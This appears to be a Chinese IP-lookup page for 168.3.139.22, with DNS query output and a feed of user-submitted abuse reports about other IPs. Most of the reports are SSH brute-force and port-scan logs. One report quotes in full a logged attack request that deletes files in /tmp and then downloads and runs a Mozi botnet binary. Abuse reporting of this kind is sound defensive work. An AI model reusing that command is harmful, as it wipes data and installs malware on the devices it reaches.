必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States of America (the)

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 168.3.139.22
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 61123
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;168.3.139.22.			IN	A

;; AUTHORITY SECTION:
.			29	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025020300 1800 900 604800 86400

;; Query time: 38 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 03 19:07:41 CST 2025
;; MSG SIZE  rcvd: 105
HOST信息:
Host 22.139.3.168.in-addr.arpa. not found: 3(NXDOMAIN)
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 22.139.3.168.in-addr.arpa: NXDOMAIN
相关IP信息:
最新评论:
IP 类型 评论内容 时间
91.234.62.171 attackbots
REQUESTED PAGE: /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws
2020-04-25 06:14:31
113.209.194.202 attack
Apr 24 22:51:29 server sshd[12019]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.209.194.202
Apr 24 22:51:32 server sshd[12019]: Failed password for invalid user carlo from 113.209.194.202 port 48790 ssh2
Apr 24 22:52:24 server sshd[12096]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=113.209.194.202
...
2020-04-25 06:13:27
51.38.235.100 attackspambots
SASL PLAIN auth failed: ruser=...
2020-04-25 06:26:24
168.196.213.188 attackbots
Automatic report - Port Scan Attack
2020-04-25 06:40:37
114.129.76.192 attack
Automatic report - Port Scan Attack
2020-04-25 06:39:50
113.184.77.26 attackbotsspam
20/4/24@16:28:54: FAIL: Alarm-Network address from=113.184.77.26
...
2020-04-25 06:45:40
111.231.141.141 attackspambots
Invalid user xs from 111.231.141.141 port 60082
2020-04-25 06:41:47
221.124.86.31 attackbotsspam
Telnet Server BruteForce Attack
2020-04-25 06:25:48
46.39.20.4 attack
(sshd) Failed SSH login from 46.39.20.4 (RU/Russia/pppoe-4-20-39-46.danpro.ru): 5 in the last 3600 secs; Ports: *; Direction: inout; Trigger: LF_SSHD; Logs: Apr 24 17:31:23 localhost sshd[3015]: Invalid user siudys from 46.39.20.4 port 42647
Apr 24 17:31:24 localhost sshd[3015]: Failed password for invalid user siudys from 46.39.20.4 port 42647 ssh2
Apr 24 17:37:33 localhost sshd[3444]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=46.39.20.4  user=root
Apr 24 17:37:34 localhost sshd[3444]: Failed password for root from 46.39.20.4 port 58550 ssh2
Apr 24 17:39:46 localhost sshd[3585]: Invalid user katie from 46.39.20.4 port 49003
2020-04-25 06:43:10
43.241.63.44 attackspambots
Apr 24 23:53:03 OPSO sshd\[14270\]: Invalid user funnews24 from 43.241.63.44 port 58480
Apr 24 23:53:03 OPSO sshd\[14270\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=43.241.63.44
Apr 24 23:53:06 OPSO sshd\[14270\]: Failed password for invalid user funnews24 from 43.241.63.44 port 58480 ssh2
Apr 24 23:57:30 OPSO sshd\[15926\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=43.241.63.44  user=root
Apr 24 23:57:31 OPSO sshd\[15926\]: Failed password for root from 43.241.63.44 port 33796 ssh2
2020-04-25 06:13:54
118.89.108.152 attackbotsspam
Invalid user og from 118.89.108.152 port 50380
2020-04-25 06:27:56
171.229.50.189 attackbotsspam
Attempts against SMTP/SSMTP
2020-04-25 06:30:15
138.68.85.35 attackbots
2020-04-24T22:10:18.154784shield sshd\[20315\]: Invalid user etfile from 138.68.85.35 port 45200
2020-04-24T22:10:18.158482shield sshd\[20315\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.85.35
2020-04-24T22:10:19.953525shield sshd\[20315\]: Failed password for invalid user etfile from 138.68.85.35 port 45200 ssh2
2020-04-24T22:16:57.815410shield sshd\[21898\]: Invalid user informix from 138.68.85.35 port 48464
2020-04-24T22:16:57.819620shield sshd\[21898\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=138.68.85.35
2020-04-25 06:22:18
34.80.223.251 attack
Apr 25 06:19:15 localhost sshd[17160]: Failed password for invalid user vlado from 34.80.223.251 port 54742 ssh2
...
2020-04-25 06:08:07
2.153.212.195 attackbotsspam
Invalid user postgres from 2.153.212.195 port 38018
2020-04-25 06:15:13

最近上报的IP列表

206.236.32.186 141.156.108.75 37.97.154.167 64.53.49.16
188.147.152.35 84.3.79.8 206.85.9.96 230.225.202.62
232.168.94.255 62.238.196.237 196.64.211.75 92.127.150.188
198.187.247.49 60.248.187.11 95.151.50.18 247.77.236.158
200.235.209.95 248.102.234.59 149.254.230.159 50.121.16.66